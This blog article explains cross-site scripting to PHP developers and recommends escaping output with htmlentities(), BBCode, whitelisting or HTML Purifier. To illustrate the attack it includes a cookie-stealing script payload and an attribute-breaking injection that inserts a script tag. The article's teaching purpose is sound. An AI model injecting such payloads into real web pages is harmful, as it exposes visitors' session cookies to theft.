Security Mecca

What are cross site scripting attacks and how can I prevent them?

Posted in Articles, Coders, PHP on


Allowing users to interact with your website through forms is a great way to set your site apart from others. However, it is also a great way to get attacked if you as the developer are not very, very cautious with the user’s entered data. Although it is probably getting tiresome to hear, security really must begin by assuming all data that you do not manually set could be tainted. That data could come from users directly such as form submissions, from external feeds, etc. No outside data can be trusted. If it is and if it is sent directly to users, serious security holes can happen.

What exactly is Cross Site Scripting or XSS as it is better known? An XSS attack happens when a web page displays HTML or JavaScript that the attacker provided. While it is oftentimes useful to show exactly what the user entered (HTML markup and all) such as in a blog or CMS system, it is inherently extremely dangerous because while a few too many strong or em tags will not hurt anyone, but an injected JavaScript with an attached piece of malware certainly will. For example, a normal user might enter

<strong>Thanks</strong> for this great blog!

for their comment, but there is nothing stopping an attacker from entering something like


<script>window.location = “” + document.cookie;</script>


which will grab the current user’s cookie (which could contain authentication information if the user is logged in) and automatically send it to the attacker’s server.

The best way to prevent XSS attacks is to disallow HTML completely. This is the safest choice because there is no possibility of forgetting a tag or missing an attributing and allowing a XSS attack through. If the developer is using PHP, this can be easily done by using the htmlentities() PHP function. This function will convert all special characters in a text string into their safe HTML entity equivalents. In other words, allowing the less than or greater than signs or quote marks are the two most dangerous groups of special characters. Since these characters close HTML tags or properties, a hacker can insert any desired HTML into the page even if it would not “logically” fit within the actual HTML code. For example, if we have a form which asks the user for a color name, then we use that color as the background color for a div element, we will open our site up to a XSS attack. Let us look at the code which will hopefully make this clearer. We have some sample HTML like this to show a background color entered by the user:

<div style=”background-color: {$color}”>a div here with some text</div>

While that does not look dangerous, it is if the attacker uses a carefully crafted “color” like

red”><script>alert(‘XSS’);</script><br class=”

Overall, the browser would see the whole line as this:

<div style=”background-color: red”><script>alert(‘XSS’);</script><br class=””>a div here with some text</div>

Notice how the attacker closed the style attribute with the extra quote mark and inserted some JavaScript to prove the attack? A XSS attack is identical in nature to a SQL injection attack, and the same basic principle in stopping SQL injection attacks can be applied here as well. Any data that gets sent to an outside source should be escaped. In other words, the special characters like the less than or greater than sign should be turned into harmless equivalent HTML entities. Appropriately enough, the htmlentities() function is ideal for this purpose as it will escape any possible problematic character.
Escaping all output is the preferred way to prevent XSS since there is no possibility of the developer forgetting a tag or a new HTML tag introduced that is not in the validator, etc. If HTML must be allowed, there are a few ways to do it relatively safely. In order of safety from the safest to the most problematic is BBCode, whitelisted HTML, and HTML validators.

An option is to use a pseudo markup language like BBCode when entering posts. This is another excellent solution since it is a form of the whitelist approach. All entered content is escaped by default then some safe pseudo code is transformed into HTML. This is much safer than the previous approach because it is a stricter whitelist: BBCode usually cannot accept attributes (style, title, etc.) and has a much more rigid syntax than HTML.

The second approach is to escape all output then turn the escaped output back into a few allowed HTML tags (a white list approach). This assumes that the validator for turning the content back into HTML is comprehensive, but it is on the right track since everything is escaped by default.

Finally, the most liberal (and therefore the one to likely cause the most problems) is to parse the entered HTML, clean it up, and remove any JavaScript. The open source PHP library HTML Purifier is probably the best library for this task since it is the oldest and most reviewed. A developer should still be wary of this approach though. While HTML Purifier is an excellent library, from a security principle standpoint, this approach could be problematic since it blacklists malicious HTML or JavaScript, and as we know by now, blacklists are more security prone than white lists.

    All of the above proposed solutions are server side based. While these are the safest since users cannot modify server based checks or routines, they do not help if a developer needs to print out user supplied text immediately such as in an advanced JavaScript application. One WebGoat tutorial had a brilliantly simple solution. It takes the user’s input, creates a div element in memory, assigns the user’s input as the div’s content text, then copies the content text back out. This seems to work well since the content text is only plain text. In other words, we will know that the text pulled back from the temporary div will be plain text.

    XSS attacks are one of the most common and one of the most dangerous attacks facing web applications today. They are incredibly easy to pull off since the tools (input fields) are already provided and the attack can be done quickly and effectively. Thankfully, XSS attacks are easy to prevent by using htmlentities() (or one of the other solutions we discussed) before sending any output whatsoever to the browser.


about the author

More about Jeremy Conley:
Jeremy Conley Jeremy is a student at Western Michigan University where he is dual majoring in Electronic Business Design and Film & Video Studies. When not programming or researching design and security topics, Jeremy enjoys movies and photography and drinking coffee in all the amazing local Kalamazoo coffee shops.

questions or comments?

If you have any questions or comments about this article, feel free to contact us!

talk back! questions/comments, and feedback. keep it polite, please